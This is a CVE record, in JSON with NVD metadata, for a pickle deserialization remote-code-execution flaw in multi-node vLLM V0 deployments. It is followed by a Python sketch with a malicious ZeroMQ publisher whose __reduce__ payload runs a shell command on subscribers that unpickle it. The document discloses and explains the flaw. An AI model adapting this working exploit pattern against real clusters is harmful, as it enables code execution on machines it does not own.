CVE-2025-30165
Vulnerability from cvelistv5
Published: 2025-05-06 16:53
Modified: 2025-05-06 17:26
Summary
Remote Code Execution Vulnerability in vLLM Multi-Node Cluster Configuration
Impacted products
vllm-project/vllm


{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2025-30165",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-05-06T17:22:47.717996Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-05-06T17:26:58.974Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "vllm",
          "vendor": "vllm-project",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 0.5.2, \u003c= 0.8.5.post1"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "vLLM is an inference and serving engine for large language models. In a multi-node vLLM deployment using the V0 engine, vLLM uses ZeroMQ for some multi-node communication purposes. The secondary vLLM hosts open a `SUB` ZeroMQ socket and connect to an `XPUB` socket on the primary vLLM host. When data is received on this `SUB` socket, it is deserialized with `pickle`. This is unsafe, as it can be abused to execute code on a remote machine. Since the vulnerability exists in a client that connects to the primary vLLM host, this vulnerability serves as an escalation point. If the primary vLLM host is compromised, this vulnerability could be used to compromise the rest of the hosts in the vLLM deployment. Attackers could also use other means to exploit the vulnerability without requiring access to the primary vLLM host. One example would be the use of ARP cache poisoning to redirect traffic to a malicious endpoint used to deliver a payload with arbitrary code to execute on the target machine. Note that this issue only affects the V0 engine, which has been off by default since v0.8.0. Further, the issue only applies to a deployment using tensor parallelism across multiple hosts, which we do not expect to be a common deployment pattern. Since V0 is has been off by default since v0.8.0 and the fix is fairly invasive, the maintainers of vLLM have decided not to fix this issue. Instead, the maintainers recommend that users ensure their environment is on a secure network in case this pattern is in use. The V1 engine is not affected by this issue."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "ADJACENT_NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-502",
              "description": "CWE-502: Deserialization of Untrusted Data",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-06T16:53:52.836Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/vllm-project/vllm/security/advisories/GHSA-9pcc-gvx5-r5wm",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-9pcc-gvx5-r5wm"
        },
        {
          "name": "https://github.com/vllm-project/vllm/blob/c21b99b91241409c2fdf9f3f8c542e8748b317be/vllm/distributed/device_communicators/shm_broadcast.py#L295-L301",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/vllm-project/vllm/blob/c21b99b91241409c2fdf9f3f8c542e8748b317be/vllm/distributed/device_communicators/shm_broadcast.py#L295-L301"
        },
        {
          "name": "https://github.com/vllm-project/vllm/blob/c21b99b91241409c2fdf9f3f8c542e8748b317be/vllm/distributed/device_communicators/shm_broadcast.py#L468-L470",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/vllm-project/vllm/blob/c21b99b91241409c2fdf9f3f8c542e8748b317be/vllm/distributed/device_communicators/shm_broadcast.py#L468-L470"
        }
      ],
      "source": {
        "advisory": "GHSA-9pcc-gvx5-r5wm",
        "discovery": "UNKNOWN"
      },
      "title": "Remote Code Execution Vulnerability in vLLM Multi-Node Cluster Configuration"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2025-30165",
    "datePublished": "2025-05-06T16:53:52.836Z",
    "dateReserved": "2025-03-17T12:41:42.567Z",
    "dateUpdated": "2025-05-06T17:26:58.974Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2025-30165\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2025-05-06T17:16:11.660\",\"lastModified\":\"2025-05-07T14:13:20.483\",\"vulnStatus\":\"Awaiting Analysis\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"vLLM is an inference and serving engine for large language models. In a multi-node vLLM deployment using the V0 engine, vLLM uses ZeroMQ for some multi-node communication purposes. The secondary vLLM hosts open a `SUB` ZeroMQ socket and connect to an `XPUB` socket on the primary vLLM host. When data is received on this `SUB` socket, it is deserialized with `pickle`. This is unsafe, as it can be abused to execute code on a remote machine. Since the vulnerability exists in a client that connects to the primary vLLM host, this vulnerability serves as an escalation point. If the primary vLLM host is compromised, this vulnerability could be used to compromise the rest of the hosts in the vLLM deployment. Attackers could also use other means to exploit the vulnerability without requiring access to the primary vLLM host. One example would be the use of ARP cache poisoning to redirect traffic to a malicious endpoint used to deliver a payload with arbitrary code to execute on the target machine. Note that this issue only affects the V0 engine, which has been off by default since v0.8.0. Further, the issue only applies to a deployment using tensor parallelism across multiple hosts, which we do not expect to be a common deployment pattern. Since V0 is has been off by default since v0.8.0 and the fix is fairly invasive, the maintainers of vLLM have decided not to fix this issue. Instead, the maintainers recommend that users ensure their environment is on a secure network in case this pattern is in use. The V1 engine is not affected by this issue.\"},{\"lang\":\"es\",\"value\":\"vLLM es un motor de inferencia y servicio para modelos de lenguaje extensos. En una implementaci\u00f3n de vLLM multinodo con el motor V0, vLLM utiliza ZeroMQ para la comunicaci\u00f3n multinodo. Los hosts secundarios de vLLM abren un socket \\\"SUB\\\" de ZeroMQ y se conectan a un socket \\\"XPUB\\\" en el host principal de vLLM. Cuando se reciben datos en este socket \\\"SUB\\\", se deserializan con \\\"pickle\\\". Esto es peligroso, ya que puede utilizarse para ejecutar c\u00f3digo en una m\u00e1quina remota. Dado que la vulnerabilidad existe en un cliente que se conecta al host principal de vLLM, sirve como punto de escalada. Si el host principal de vLLM se ve comprometido, esta vulnerabilidad podr\u00eda utilizarse para comprometer el resto de los hosts de la implementaci\u00f3n de vLLM. Los atacantes tambi\u00e9n podr\u00edan utilizar otros medios para explotar la vulnerabilidad sin necesidad de acceder al host principal de vLLM. Un ejemplo ser\u00eda el uso de envenenamiento de cach\u00e9 ARP para redirigir el tr\u00e1fico a un endpoint malicioso utilizado para entregar un payload con c\u00f3digo arbitrario que se ejecuta en la m\u00e1quina objetivo. Tenga en cuenta que este problema solo afecta al motor V0, que ha estado desactivado por defecto desde la versi\u00f3n v0.8.0. Adem\u00e1s, el problema solo se aplica a implementaciones que utilizan paralelismo tensorial en varios hosts, lo cual no esperamos que sea un patr\u00f3n de implementaci\u00f3n com\u00fan. 
Dado que V0 ha estado desactivado por defecto desde la versi\u00f3n v0.8.0 y la soluci\u00f3n es bastante invasiva, los responsables de vLLM han decidido no corregir este problema. En su lugar, recomiendan a los usuarios que se aseguren de que su entorno est\u00e9 en una red segura en caso de que se utilice este patr\u00f3n. El motor V1 no se ve afectado por este problema.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":8.0,\"baseSeverity\":\"HIGH\",\"attackVector\":\"ADJACENT_NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.1,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-502\"}]}],\"references\":[{\"url\":\"https://github.com/vllm-project/vllm/blob/c21b99b91241409c2fdf9f3f8c542e8748b317be/vllm/distributed/device_communicators/shm_broadcast.py#L295-L301\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/vllm-project/vllm/blob/c21b99b91241409c2fdf9f3f8c542e8748b317be/vllm/distributed/device_communicators/shm_broadcast.py#L468-L470\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/vllm-project/vllm/security/advisories/GHSA-9pcc-gvx5-r5wm\",\"source\":\"security-advisories@github.com\"}]}}"
  }
}
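
For readers who want to see what the unsafe pattern looks like in practice, the following minimal Python sketch mirrors the behaviour described in the record: a ZeroMQ `SUB` socket whose received bytes are passed straight to `pickle.loads`, and a publisher that abuses `__reduce__` so that deserialization runs an attacker-chosen command (CWE-502). This is an illustration only, not vLLM's actual implementation (the real code is in the shm_broadcast.py lines referenced above); the hostname, port, and class names are placeholders invented for this example.

import pickle

import zmq


class EvilPayload:
    """Object whose unpickling executes an attacker-chosen command."""

    def __reduce__(self):
        import os
        # pickle.loads() on the receiving host will call os.system("id").
        return (os.system, ("id",))


def malicious_publisher(endpoint: str = "tcp://*:5557") -> None:
    """Stand-in for a compromised primary host (or a spoofed endpoint)."""
    ctx = zmq.Context.instance()
    pub = ctx.socket(zmq.XPUB)
    pub.bind(endpoint)
    pub.send(pickle.dumps(EvilPayload()))  # crafted pickle payload


def vulnerable_subscriber(endpoint: str = "tcp://primary-host:5557") -> None:
    """Mimics the unsafe pattern: SUB socket + pickle.loads on untrusted bytes."""
    ctx = zmq.Context.instance()
    sub = ctx.socket(zmq.SUB)
    sub.setsockopt(zmq.SUBSCRIBE, b"")  # subscribe to all topics
    sub.connect(endpoint)
    data = sub.recv()
    obj = pickle.loads(data)  # unsafe: deserializing untrusted data runs code
    print("received:", obj)

In a real deployment the subscriber corresponds to a secondary vLLM host, which is why a compromised primary host, or an endpoint spoofed via something like ARP cache poisoning, can lead to code execution on every node that connects to it.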

